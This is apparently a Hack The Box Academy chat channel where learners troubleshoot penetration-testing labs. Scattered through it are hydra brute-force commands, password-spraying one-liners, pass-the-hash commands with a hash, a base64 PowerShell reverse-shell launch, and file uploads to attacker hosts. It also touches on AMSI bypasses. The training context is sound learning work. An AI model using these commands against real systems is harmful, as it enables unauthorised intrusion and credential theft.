#modules

I still don't know how can the same payload work on local and not on the remote target, but I found a bypass I guess by changing the payload

It has nothing to do with perms...

ok, maybe I understand now

Depending on what stage you are in the SA, it has to do with permissions
The account might not have the same privileges in the debugging machine and the SA’s target

I'm on the Penetration Testing path, in the "Getting Started" module, specifically on the "Web Enumeration" page. I'm using DirBuster to enumerate directories and have found two paths so far:

http://94.237.60.154:49669/index.php
http://94.237.60.154:49669/wordpress

However, on the WordPress page, I can't select a language. I'm not sure how to proceed with the questions and could really use some hints. Any help would be appreciated!

as much as I'd love to discuss it, I don't want to spoil it for myself rn. Although, I'm fairly certain this is environment fuckery and not permissions

but makes sense what you write, just not in this context for me

There is a note in one of the sections about it

well I got through the first hoop, so I may DM you afterwards if you don't mind

probably not today tho

@ocean night I would like to apply for a refund. I accidentally purchased the Gold Annual Subscription without realizing that I had not canceled my subscription. Due to work reasons, I will not be using it for the time being. Please assist with the refund, thank you.

Why pinging me?

https://help.hackthebox.com

Because I looked at the historical messages, you had helped with it before, and it caused you a bad feeling. I'm sorry.

Sorry, I just keep getting pinged left right and center

But yeah, speak with support

They will help you if they can.

Note it is late in the day, so there may be a delay in response time.

thank you so much

No problem

I'm currently going through the Network Enumeration with NMAP module, and I can't seem to get tcpdump to pick up the three-way handshake from the nc -nv command

What are some of the most common errors here that I might be missing?

you filtering on the correct interface? the correct port?

Is the correct interface the target IP and the IP of my VPN connection? Does the order matter?

(First time asking a question, so I don’t know how vague I need to be for other’s sake)

As far as the port, I think this instance is… well, very in-your-face about it

make sure tcpdump is listening on the correct interface. The default is unlikely to be the VPN interface if you're trying to capture a connection in the lab environment.

Sorry, apparently I wasn't scrolled all the way down and didn't see Gubarz's reply already.

The VPN interface is likely "tun0". You can see all your interfaces with "ip addr" or "ip link" commands.

It was, in fact, tun0. I was trying eth0 this whole time! Thank you!!

Time to reflect and understand why that was the case

How do I copy payloads from modules into the pwnboxes?

Ctrl C doesnt work lol

Why are some modules sooo expensive?? Like they're based on cubes amd cubes are expensive making them expensive

help

Ctrl + Shift + C doesn't work either?

Does not,

Its weird I somehow did it once but it only copied like half of the payload

Does anyone know why I have 4 different terminals all running hydra -t 48 in Kali Linux and Kali vm still shows CPU is at 1%?

And as always hydra is taking forever

Is there a subnet that I can whitelist in a firewall to alleviate any connectivity issues with the HTB content?

Not currently I'm afraid @terse sedge - I don't believe our IP blocks are contiguous at the moment, but you could always resolve the edge server defined in your ovpn file and whitelist that

All web services go through cloudflare, so you may be able to get a list of subnets from them.

What type of connectivity issues are you facing?

If you're talking about the IPs within the labs once connected to the VPN, I can get those for you.

Is it academy you are having issues with @terse sedge ?

..and if so, any specific subnet that's giving you trouble?

...ok, well ping me if you are still having issues and need the subnets I guess

(although the subnet routes are pushed to you when connecting to the VPN server)

..and they transit through the VPN connection on your host

so unless you have a very restrictive local firewall, I don't think a firewall would be causing you issues

please put module name, section name, question, etc. so people can help out more easily

its command injection the link is there. there is only 1 question, bypassing blacklisted commands

it's harder for people on mobile to use the link

That's a Tier 2 module

Please avoid posting any direct spoilers like that

lol htb academy doesnt work on mobile before me

Rather ask for generic advice, or for someone to DM to help advise.

💀

alr

ty

Anyone struggling with the academy lately? it just keeps crashing, I want to use my own parrot box and the VPN servers just not working, when it comes to file transfer onto target it takes forever if it even completes, is it just me?

I think its general issue.. I have the same problem too

Hi, I am currently following the “Password Attacks: Attacking SAM” module. I was replicated the steps up till creating the share with smbserver.py. However when I try to move the files from the rdp machine, I keep encountering the access denied error on the rdp machine. Any advice on how to resolve this?

Shame it always feels when I try use my own box i get so limited, files not transfering, when solving a box, a web vulnerability for initial access not working as it should

Double check the command you used to spin up your SMB server. The command they have in the module has the writer's home directory. Double check and make sure you're using your home directory instead.

The command in the module: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
The command modified to use my home directory (for example): sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/miaha/Documents/

Anyone knows how to fix this error? I am doing bleeding edge vulnerblity of active directory enumiration and attacks module I have succesfully taken the certificate of the dc but can't get that saved to a cache file I have tried creating new certificate and added that also but same error

thanks! will try again!

I can’t use general do I will ask here how should I start learning to hack ? Like if there non buyable stuff that I can use things like that

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thanks

Is there a way to have two boxes open at the same time?

Hey! I have looked at all the open ports and searched for an exploit for each of the services but no luck... Would you have another insight? Thx!

Were you able to figure it out? I'm stuck.

is this normal output from hydra?

Okay what module and section are you in? Mutated passwords?

Password attacks labs easy

My bad I thought you were in Mutated passwords. Sorry. Let me look at this again, and then give you a sanity. I assumed you were in password mutations because that's where most individuals have the issue with the time running for a long time

thats on me

Yea yea I left that module run for like 20 hours

Then I woke up and saw the creds

did you try using the pwn machine (the web based machine)?

I think you have access x hours a day or something

No haven't tried

You could try your command and see if it is significantly faster. It seems wild it would take more than 10 min

smells like something real wrong with your VM/connection

How the hell do I copy paste

no idea, just type it out 😄

but if you are doing this one, then you don't need the mutated list right?

from what I understand l0s saying

Hydra finished doing the non mutated list and found nothing

But at this point I don't trust it anymore

hmm, lets see what l0s finds then

let me see if I have enough cubes to try that lab 😄

Lol thx

ah damn, not enough cubes 😦

oh well, I am sure someone has done it, otherwise plenty people in here seem to have done Password Attacks

Ye ye it's not a problem

Thx

Currently brute-forcing. Just giving hydra some time to work it's magic.

I'm using pwnbox rn

Doing the same. 👍 I'm going to step away for a few minutes to let it run so I'll follow up in a few

Ye same

Fuck tech i wish I was a farmer

WHY DOES IT LOOSE CONNECTION

Is it saying retrying connection for child [insert number here]

Turn down the threads to 34

There's a threshhold it hits and begins to become overwhelmed

Aight I'm not touching it again for 5 minutes

I'll eat a croissant

Fuck this

It's still going

Mine is too so keep letting it go

Okay

I'm fucked either way bc if it works there's something wrong with my VM if it doesn't work there's something wrong with my laptop

Or connection

It looks to be pretty far down the list

from forum posts

And then think it has to iterate over all those usernames

Ye

The thing that's fucked is that I can't even do another box I'm stuck waiting

HI
Pivoting, Tunneling, and Port Forwarding > Remote/Reverse Port Forwarding with SSH

when i running backupscript.exe to get revrseshell it didnt work, i think that because i didnt put the right ips on this i used this

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.132.37 -vN

what should i replace on these < >

ens192:10.129.132.37
ens224:172.16.5.129
windows:172.16.5.19

I would have prob been halfway through attacking common service module by now if it didn't disconnect as soon as I spawn another target

I'm down to 9000 tries

Same

Still going. It's on these lists.

Got it

So just give it some more time

im having a little issue in linux fundamentals...the password to ssh is coming back wrong

Anything?

i didnt know where else to post/ask 🤷‍♂️

Another great module!
https://academy.hackthebox.com/achievement/799850/235

Time to wait the subscription hit again!

18k tries done, 75k to do

What lists are you using again?

i guess theres no help for me since its a password and its failing...trying to respawn machine....see if that fixes the password "bug"

respawn fixed it

Hashcat --force password.list -r custom.rule --stdout | sort -u > mutatepass.list

Which ones are in your hydra command?

Hydra -L username.list -P mutatepass.list ftp://ip -t 34 -f -vvv

swap it to password.list

I tried it finishes very quickly and gave zero creds

Try it one more time. with the threads at 34

Ok

Let me know if it finishes quick again

It's doing its thing

Perfect. I'd put something on and chill for a minute if it doesn't finish unexpectedly.

I'm watching narcos

And petting my cat

Ayyye, Pablo the goat

@scenic plover it got to 11k tries done out of 20k and then is disconnected

@real delta what do you normally use for brute forcing in password attack easy lab

I haven't done the lab

You can use the -R to resume the last brute-force if you got disconnected

Tried

Restore file not found

Did you get the creds?

I seem to be having alot of issues with the Evading AD module, in open source software all amsi bypasses dont work because the Load() always gets called out

Yeah, I used the username list they give you in the resource and the password.list. I used 34 threads too

Took me a total of 15 minutes

What the fuck

What does it say when you get disconnected?

Also could the target have expired?

Disable child bc of too many error

No it has 100 minutes of life

Btw is there a way to make hydra more visually catching? It found the creds but kept going and I didn't see them

It says it took 12 minutes but I don't believe it

But it did find the password and user?

Using Web Proxies, Burp Intruder

Guys, (Excuse my english) using burpsuite intruder: the § symbol, where should it placed exactly? or used?

I am supposed to look for a '.html' file in the /admin directory.

But the examples I see in the session do stuff like this:

GET /§DIRECTORY§/ HTTP/1.1

Should I be doing something like this?

GET /admin/§whatever§ HTTP/1.1

Yes

Thank you brother

💪

The only thing that holds the flag generation in that module is the scan that only trigger with specific parameters

If you change one small thing, it will not generate the flag

I copied everything after I couldnt get it working myself

Awesome. Just making sure I didn’t waste all of your time. 🤣 If you use -f it should stop upon finding the first valid set of creds.

in the ss I have shows I even use their syntax to run the scripts, and try all 3 they offer

I got stopped a couple of times because of compiling it in a .NET console app instead of the framework

Ah maybe thats the issue, its just compiled in VS code

Even with codes that achieved what I wanted in different ways

No no absolutely you've been extremely useful thank you

I got a couple of different scripts that spawned and injected in a process

And only one thing would get the flag

When it says denied access - public key if I remember correctly it's in the nmap scan or something?

Check the ports again and try tossing those credentials around a bit to do some manual enum. Might find an interesting document or something

Yeah I have been having issues the whole module. Interesting to see others have aswell

Still cant get the static analysis flag becuase it never turns up

I used that PowerShell C# in a ps1 script

I'm in the broken authentication module and on the authentication bypass via parameter modification. I fuzzed for the user id and got the flag but the flag doesnt work. it says incorrect flag.

Think it’s the same as rasta-mouse’s amsiscanbuffer

Have to use the aes encryption approach, I think

Also got hanged in this

Yeah I did, copied the script exactly in the end, and on the host it scanned and said it passed all checks but no flag was produced 🙃

Support said they dont help with modules so it wont be an issue till I complete the AD pathway

I'll try this

I dont understand why the flag I got doesnt work

I ran this and I still get the same error

I have to assume its something I am doing but I don't understand why none of the patches are working

Is it possible for the module to give me the wrong flag or something?

Unlikely

nevermind I got it. I was copying and pasting and it had a space at the beginning

It seems the amsi bypass is working but the script can never run

Also sidenote, you cant run .exe as a local group policy so the method of running seatbelt.exe never works (obfuscated past defender)

I would love someone to come correct me but for now I think this module is broken

Burp will iterate through the wordlist and place items in the wordlist inside whatever's wrapped in the § characters.

Guys I'm in password attack medium lab. I found the .zip file but I zip2john isn't cracking it idk why

zip2john isn't the tool that cracks the password.

hi how many processes should I have going at once if I want this ssh attack to go quickly? this is for the Password Attacks Module in the Linux Credential Hunting section:

hydra -L username.list -P password.list 10.129.194.188 ssh -t 16

maybe 4 max. ssh is slow.

ok

but I tried four and it was taking days to finish like it wouldn't finish in time

probably brute forcing the wrong service or using a wordlist that doesn't contain the passwd then

I used the list in the resources section

I saw in the help near the question abt ssh2john

But how would that help? It's a .zip file not an ssh key

zip2john just provides the hash you can use with john. zip2john just converts it for you, it doesn't crack it, you have to use john to crack the hash.

Oh ye sry I meant that

I did zip2john and made zip.hash then used John --wordlist= rockyou.txt zip.hash

Doesn't crack it, I also tried password.list provided in resources and also pws.list

I'm also trying with hashcat but same

did you try the mutated password list? 😉

Holy shit not again

Wtffffff bro

It's gonna take 4 hours again

it doesn't take anywhere near that long, if your computer is that slow do it on the pwnbox

Oh it was very quick : )

Thank you super nuts

guys i'm doing the second skill assessment from attacking common web apps and i got the flag and everything but i'm stuck at the first question "What is the URL of the WordPress instance? " what i'm missing here ?

guys, does anynone have experience with burp?? im trying to use the intruder for the first time, but the payload position is greyed out, cant use it

there's a whole module that talks about web proxies which uses burp heavily.

yes, that's the one im using to study

but my burp is not allowing me to use the payload intruder

idk if they removed this from the free version

pretty sure they wouldn't do that

did you send something to intruder first?

^

nvm, they simplified, i missed the word ' list '

list is empty, not the position, mb

thanks a lot man

im a newbie here lol

we're all newbies and here to learn

no shame

https://tenor.com/view/jake-adventure-time-sucking-sort-of-good-gif-22475109

Port 80, try some basic web enumeration.

hi this command didn't work:

    5  hydra -L username.list -P password.list 10.129.194.188 ssh -t 4
    6  hydra -L username.list -P password.list 10.129.194.188 ssh -t 16
    7  hydra -L username.list -P password.list 10.129.194.188 ssh -t 36
    8  hydra -L username.list -P password.list 10.129.194.188 ssh -t 64

I just get this:

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-06 23:22:56```

this is for the Password Attacks Module's Linux Credential hunting section

am I not supposed to use hydra?

Hello, im following the Active Directory Enumeration & Attacks module but i'm having trouble connecting to most windows machines.

The boxes of this module seem quite unstable as they sometimes work flawlessly, but more often I can't connect to them at all.
The problem persists when trying different rdp tools such as xfreerdp and remmina or when switching between the pwnbox or my own kali machine. My method now is spawning the target and seeing if i can connect to it normally after I let it boot up for about 3-5 mins.
I was wondering if i'm doing something wrong and what I should do differently.

I would say it does allow me to connect once every 6 reboots

Oh i might have found something but I haven't thoroughly tested it yet.
Using the setting /gfx:AVC420 to minimize advanced features seems to be working somehow

I tried WMI but even that aint working for me

i am on password attacks , pass the hash and stuck on the last question i am not able to connect to DC01 , nc aint responding i tried both SMB and WMI

wrong lists

also try to work on a faster protocol ssh is slow and -t 4 is the max it can process the higher -t wont work

can anyone please help me w this ?
thankyou

is there a legal issue with recording the academy material for educational (explanatory) purposes and publishing them online?
if yes, does avoid mentioning HTB academy solves the issue?

as far as I understand, sharing anything above tier 0 content is against terms of service

if HTB was never mentioned, how would they link the published content to theirs?

if you loose a shoe and you start looking for it, how would you know it is yours when you find it

i'd look for a something that only exists on my shoe. which mostly doesn't exist

Anyone

sounds like an awesome way to lose goodwill with a major player in the industry

nah, i just find writing content is the best way to assure that you understand a topic very well.. so instead of letting it rot, why not publish it

hmn

"I just find writing <-> is the best way to assure <yourself> that you understand a topic very well" -> I definitely agree

by definition though, it wouldn't rot from then. It would have served its purpose. It might still serve more purpose later on when you come back to your private notes

if you are honest about it though, and rephrase it: "so if I can benefit from it too, why not publish it?" -> because it is against terms of service

if for the first sentence you actually mean "I find that writing content is the best way to assure <others, like an employer> that you understand a topic very well", I disagree, because you can't prove you didn't regurgitate it. The best way to assure others is by demonstrating the skill

that's correct.
i meant the first, writing content proves to yourself that you understood the material correctly. and if u are a good writer it will ease the understanding process to other people in the same boat

ok, that's fair enough. Still, it is against terms of service

so that should be that

Hii

Help me

If here someone is a hack who can help me please dm

hey guys it this a channel for discussing the boxes, are i am in wrong place?? thank you

this is for HTB Academy modules, for HTB boxes there's #boxes. I think you need to indentify yourself first to have access, so please check #rules and then #welcome

recently released boxes have their own dedicated channels too (by name), you'll see them

is any can help me solve this problem

Thank you buddy

it's your json, needs more quotes

i think put the JSON between quotes?

this is what i have been trying couldf anyone pls help ?

Module: Attacking common services
Section: Attacking SQL Databases

Task: What is the password for the "mssqlsvc" user?

what I've tried?

1. I've tried impersonating(i get permission restriction, unable to imepersonate to sa user), retrieving hash ( again lack of permission to retrieve hash, ```1> EXEC master..xp_subdirs '\10.129.225.129\share'
   2> GO
   Msg 229, Level 14, State 5, Server WIN-02\SQLEXPRESS, Procedure master..xp_subdirs, Line 1
   The EXECUTE permission was denied on the object 'xp_subdirs', database 'mssqlsystemresource', schema 'sys'.

Hii help

Are u a hacker

far from it

Can u help me

I can't

Do you know someone who can help me

This is module section, you should probably hit up in general section.

I don't have access

read #welcome #rules

What do you need help with Batman?

Check dm

Okay

I don't know about you but I find it pretty cool that when we need Batman we activate the Bat-signal, but when Batman needs help he comes to HTB 😎

Bro check dm please

No, activate the .BAT-file:)

Got the problem with module Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows when trying to crack the tgs with hashcat or john. Neither is working. Please help

Intro to assembly language

Debugging with GDB section
Find hex value in 'rax' in instruction <_start+16> question

I tried hex value i got once reached _start+16 with the help of break command

But it doesn't take the value i entered any clues

Keep getting con reset when trying to connect to port 800 wtf am i doing wrong? Reseted the target 3 times already

https://academy.hackthebox.com/module/113/section/1213

Guys

Who knows about the Nuri smart CIU

check the protocol

wdym?

https?

Web applications run primarily on two protocols, unencrypted and encrypted

Doesnt work on either http or https

Why would it ever work on https on a htb lab?

Hi everyone I am currently on the Windows Attacks & Defense module and I cannot RDP into the first box (Kerberoasting), it says wrong credentials

I had no problems with the previous modules which required RDP as well

I guess it did...

@autumn pilot How did you know?

Good morning guys, can someone help me with the signature wrapping attack? I've been trying to modify this XML for a few days but it's always giving problems

Hi i am looking for CTF team

best to ask in #1225791307256168448

INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
main()
File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
res = sock.sendrecv(req)
File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError: Error Name: KDC_ERR_PADATA_TYPE_NOSUPP Detail: "KDC has no support for PADATA type (pre-authentication data)"

Does anyone know how to fix this? Bleeding edge vulns of ad enumeration and attacks

@acoustic owl can u give me a hint?

Heyy guys do u know a guy named big brain here

this is not a channel to just chat about random things @rustic sage

please read #welcome

hint for what?

In this matter, I don't know what I'm doing wrong so if you can give me a tip I'd really appreciate it

If you're using xmllint- don't

I’m not, im doing manually

SAML?

Yes

Signature wrapping attack

Was just performing a fresh kali install, but having this issue for the first time. It's affecting the shared clipboard and prolly other functionality. Anyone know how to fix this? I was just installing the guest additions for this virtual machine in virtualbox.

Also, this was the first time I couldn't run the VBoxLinuxAdditions.run directly, I had to copy all the contents from the cd image to a folder and then run it since it kept saying "permission denied" (yes, I tried running it with sudo and changing the permission, but changing the permission prompted me with "read-only file system").

Also, if I'm in the wrong channel, sorry, please direct me to the right one. Thanks!

Make sure that you do not touch the original assertion and only add your assertion additionally

Can I dm you?

sure

hello everyone , can anyone please help me with this ? from password attack / windows lateral movement / pass the hash

Yes got it thanks a lot!

Hey guys!
https://academy.hackthebox.com/module/143/section/1485

Performing a Reverse Search & Mapping to a GUID Value -

An error occurred while enumerating through a collection: The (&ObjectClass -like 'ControlAccessRight') search filter is invalid..
At C:\Tools\PowerView.ps1:6664 char:13
+             $Results | Where-Object {$_} | ForEach-Object {
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (System.Director...sultsEnumerator:ResultsEnumerator) [], RuntimeException
    + FullyQualifiedErrorId : BadEnumeration```
can someone please help me on this (not much familiar with PS)?

Sanity check on Pivoting skill assessment?

I made a pivot with metasploit and did a ping sweep from meterpter but after setting up the socks server and adding the subnet to the routing table nmap still just says the host is down

Can anyone help with attacking lsass section in pentest job role, I have vendor hash but seems to produce a different password everytime I run hashcat non of which seems to be correct

feel free to dm with the hash you found

I completed this a couple days ago and still have the history in my terminal

Thanks 1 min

literally did everything and tried with both socks4 and socks5

hello i am at Attacking Enterprise Networks Lateral Movemnt at Post-Exploitation/Pillaging
I added my user to the Administrators using the vulnerability on the program that the module says, but i cant open the cmd or powershell as Administrator to run mimikatz for some reason, do i have to do smothign else ? Like use the kdbx file?

i had to logout login nevermind

I just tried firing up the target machine for the section you listed. Weirdly enough, I can't RDP, it says incorrect credentials... which is weird cuz I copy-pasted it like I always do. I'm assuming you're able to RDP since you tried running the command?

Yes, works only with xfreerdp

I was having trouble logging in with xfreerdp, that's why I tried rdesktop. Will try xfreerdp again.

It will show blank black screen sometimes, try hitting some random keys

Ah, yeah. Hitting Enter usually works when that happens.

Trying the command you were having an issue with now.

Let me know

Worked for me. I even copied your command exactly, so it's kinda weird...

Ohh, I'll try resetting machine

According to the error you received, it has to do with the filter part of the command. I tried running your output through ChatGPT, it suggested enclosing it in double quotes like this:

-Filter "ObjectClass -like 'controlAccessRight'"

So, you could give that a shot. But resetting should prolly fix the issue you're having.

I'll try both, thanks 👍

Another thing you could try is using -eq, so like this:

-Filter "ObjectClass -eq 'controlAccessRight'"

hi guys

Lmk if you're still getting that error. I wanna know why it's behaving that way for you too.

anyone know why Im getting this error?

Might be because of the extra space before -u. Try and lmk.

Sure, will do once I'm back.

not cos of that unfortunately

How is the online tool called again to encode/decode all kinds per drag & drop - cant figure it out yet - thx

thats my command

I think cyber chef?

Try using netexec instead. Crackmapexec is no longer maintained iirc. But it should still work...

still stuck unfortunately

try using NetExec

ahh ok

idk why htb academy was giving the command for crackmap, why would they put something outdated

virtually the same as CME, you can try the exact same command

tbh Im returning to the module after a long time

ok ty

I can't tell much from the error, prolly something to do with the python libraries maybe.

they will update the content in time

i know they're already doing it for CBBH

@storm elk

ahh ok

ok thx

Sorry can’t help there

Oh okay

help plz my brain is gonna explode

Hi guys for the password reuse/default passwords module does anyone have any clues they could give me pls?

try this

pipx install git+https://github.com/byt3bl33d3r/CrackMapExec

Cme is deprecated

And archived

Use netexec instead

I deleted your message because technical spoiler in the filename

Thanks, I just installed netexex as suggested

Pls

does anyone have a powershell script that can start an http server?cus with double-pivoting i have really problem ;p

What are you using to pivot?

ligolo,i just need to start a powershell server somehow

http server

try using Start-HTTPListener, I know you can create a webshell on a windows server with PowerShell PSWA as well

$httpListener = New-Object System.Net.HttpListener
$httpListener.Prefixes.Add("http://localhost:9090/")
$httpListener.Start()

New-NetFirewallRule -DisplayName "AllowTestWebServer" -Direction Inbound -Protocol TCP –LocalPort 9090 -Action Allow

i will be able to download from this?

i ll go check it

Can someone help me with this Signature wrapping attack? I'm really stuck and I don't know where I'm going wrong in XML

have u got smb on the windows machine ?

just use copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

yes,but i can't connect to the smb with this linux machine.Thats why i am searching for a simple poerwshell that starts a http server

if your using ligolo you should be able to

the last machine,isn't able to connect to an smb

Someone? Introduction to authentication mechanism

I really don’t have any idea

If you dm me what you’ve tried I’ll take a look after dinner

try python3 -m http.server 8000 --directory /path/on/linux/
Invoke-WebRequest -Uri "http://linux_ip:8000/upload" -Method Put -InFile "C:\path\to\your\file.txt"

you would need to download it on the pivothost though if you dont have access to the last windows machine

crackmapexec smb 10.129.216.193 -u jmarston -p /usr/share/wordlists/fasttrack.txt

anyone any idea why this wont work on attack box

what error are you getting?

command not found

So you've got crackmapexec on the machine your on?

its ok ive just learned CME is depreaceated

Using a Bash one-liner for the Attack

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done

Kerbrute

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

CME

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Validate the creds:

sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123

try any of those 😄 and yeah use nxc if you can

nxc smb 192.168.1.101 -u /path/to/users.txt -p Summer18
nxc smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt

thanks bro sorted now

Trying to exploit PRTG. Why is it dropping connections ?

Not every machine responds to a ping

Have you tried the PwnBox?

metasploit did the trick

tried - double quote with and without escape, replaced with -eq, removed {}. Now, resetting the machine one more time and will wait for 5mins to load all the things before querying

I imported powerview.ps1 module, am I missing anything else? when I run it for the first time, it automatically loads the AD module.

can sm1 dm me and help me on the command injection module just to avoid spoilers here

I'm also running the powershell command as admin

So none of it worked? Even after resetting?

machine just spin up, trying one more time

still no luck

That's really weird...

Still the very same error or a different error?

same error

Okay, just try removing the filter part and tell me if you get anything.

yup, worked WIHOUT* filter

Worked with??

What did you change to make it work?

it was filter's mismatch i guess

ran this - Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl

Filter's mismatch? That's strange...

when time comes, will learn filters later

Hmm... What I find strange is that the syntax of the command you originally used was perfect, I even copy-pasted it, and it worked for me.

The target should be standard, so not sure why...

yeah, I'm confused too

Were you using the same GUID from the example?

nope, I got it from Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

I'm not on my laptop rn so I can't check the output of that, and whether it's the same as the example.

I used the GUID from the example. Maybe it didn't work because the GUID was different.

Wait, doesn't that command just show you what objects a user has access to?

yeah pretty much

It's been a while since I did the module, memory's not the freshest, but ain't that a separate thing from the thing he's trying to reverse map?

ObjectAceType property is returning a GUID value

it for one of the questions for the object ace type question i justed used bloodhound ngl

@frank sun when you use the GUID from the example snippet itself, does the command work?

both example and from target machine - sid,guid,etc. almost everything is same

So... Both GUID's are 100% the same but the command still threw the error?

I believe its nothing to do with guid, more with filter syntax

yes

Yeah, I've got no clue then 💀

If someone figures this out, please ping me. I'd like to know why.

yup

CN=Dana Amundsen - combination could be anything??

am I missing any step here? or is it just based on the famous <first-name-first-letter><last-name> (or vise versa) guess

heyy marcielee could you please look at my issue once , i have seen older texts and you have solved this issue for someone else earlier i am really sorry to disturb you like that but i am stuck on it for a while and no one replied to my query the whole day

It's the samaccountname

.

ohh, it better to run Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt first?

Sure

The $sid is the important bit from the message i deleted btw

is there any other way you want to share?

Do I let it run

Could anyone please help me with this Password Attacks / Pass the Hash , i am stuck here for a while now , i have already tried a few more variations by switching .htb to .local in domain name and also switching target by ip/dc01 and rechecked the base64 command , still nc isnt listening and making connection , nothing is working , could anyone pls tell what am i missing here ?
it would be a great help , thankyou

catch the shell

isnt working

nc -lvnp 8001

need help with windows fundementals module

@frank sun

@fathom pendant

im trying to smbclient to it using smbclient -L IP -U htb-student but it just says NT_STATUS_UNSUCCESSFUL

I have it running and the windows instance running idk why its saying that?

do I need another ip other than the ip i used for xfreerdp?

where is your nc running?

in my cmd

the compromised administrator machine

try using another tool like mimikatz or rubeus ?

but the point of this module was to achieve a reverse shell using invoke-wmiexec or invoke-smbexec

@frank sun

Did u decode the base64 and change the ip?

yes

did use powershell #3 (Base64)?

yes

my base64 almost match the one given in the module

not the end tho idk why even tho the ip and port are same

This is what my notes said for this part: REV SHELL NOT WORKING? type ipconfig and try the other local ip for the rev shell. also try press enter on the netcat session

so i tried to ditch mine and run the exact same module command too but even that didnt work

so maybe its the other local ip you need to use?

ohhhh

maybe i can try that but thye have specified the machine name i.e DC01 should work too

This is what my notes say as well: Note: This is to connect from one windows machine to another HOST:MS01 to DC01, you specify the hostname as the target not the IP run the nc.exe on your other windows machine.

you might be trying an IP of public that you use for rdp that won't work, try source listener IP from same domain IP

check that as well ^

yes i am pretty sure i am doing this

Hi all need a little help with a question of active directory powerview skill assessment, the question is: find sid of rachel.flemmings and my question is where is rachel.flemmings ??

My notes also say Go to reverse shell website and create a rev shell with PowerShell #3 (Base64) put your IP and port in there.

well i will try again with your recommendations gimme a min

yes i have done that

like i had the same ip as the module 172.16.1.5

and used same port too 8001 but my base64 encoding was still diff

yes

i didnt change any default settings , kept the encoding on nome and shell to sh

still i had a lil diff base64 i am not sure if it is meant to happen

idts it should but alr

os - windows
powershell #3 (Base64)
ip - 172.16... (nc listening)
port - any (8001)

for your target you've put the ip, do it like this:

Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e

yes i have tried this too

but it wasnt working , i have tried both .htb and .local in domain name too

try ping the other machine see if u get a response

while the base64 of module ends with yAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

ok i will try that

the document reporting lab VM is terrible

its like a reallly shitty Parrot os that loads like its on dialup

Good evening , could someone help with this :
How many files exist on the system that have the ".log" file extension?
locate *.log | wc -l
24
when i filled in the the the answer it says incorrect

try find instead

find / -type f -name "*.log" 2>/dev/null | wc -l

try with sudo as well

okay but before that command i did
find /etc/ -name *.log 2>/dev/null | grep system | wc -l
find -name *.log 2>/dev/null | grep system | wc -l

i got 0

find did not return any system I guess

this should work

thanks it worked

it was 32

DCSync (module 143 in AD) is broken. The provided instructions don’t even work. Platform is worse each week.

Perhaps providing some output of the commands you've run might help find the issue and resolve it

@strange pivot @frank sun

I've just tested the exercises in the DCSync section and everything is working as expected

not working i tried ping and yes it is active

and the base64 encoded shell is connecting to 10.129.164.187 yes?

@strange pivot i have rdp as administrator is it correct or should i try it w julio too so that cmd would be on her machine or i could just open cmd as julio using minikatz

which list is the right one? the custom rules one?

yes i think so idr exactly

but idts i need to do that

i used that ip to rdp to the machine which is my attacker and target is still the one 172.16.1.5 i.e DC01

so i need to base64 encode that , no?

and then connect my main machine 10.129.164.187 to that

through nc'

Do this type ipconfig and try the other local ip for the rev shell

ok just a min

@strange pivot not working

See if the process is running on DC01?

check by its PID

Good to know.

yeaaaaa it is not running in the first place

Ill jump on that section and try it myself, whats the section called? 😄

password attacks / pass the hash

last question

ok doing it now

add me and give me the rdp user and pass etc...

||xfreerdp /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453 /v:10.129.164.187||

Guys in password attacks hard lab I have to brute force rdp right?

I'm so fucking tired or waiting for brute forcing fk

It's literally eating half of my day

it should not

all the brute force attacks are under 40 mins max

No me and loserr have wasted a whole night trying to a lab yesterday

Fucking hydra

Can u rate modules

i am a noob man , only at my 4th module so far

hi I think I need to brute force the ssh connection for this section's flag. I have tried this but I think I am getting the brute-force format wrong:

hydra -l Will -x 5:9 ssh://10.129.208.34 -t 4

or like this:

hydra -l Will -x 5:9 10.129.208.34 ssh -t 4

why dont we try ftp there aint it faster ?

its not about speed. I get a error when I try to brute force it and I think I am doing the command wrong

What's 5:9?

pattern

I want to try any characters, numbers letters and symbols, but only try passwords with password length between 5 and 9

to speed it up a little

the hint says I need to brute force

I tried dictionary attacks and they didn't work too

even when I did it right

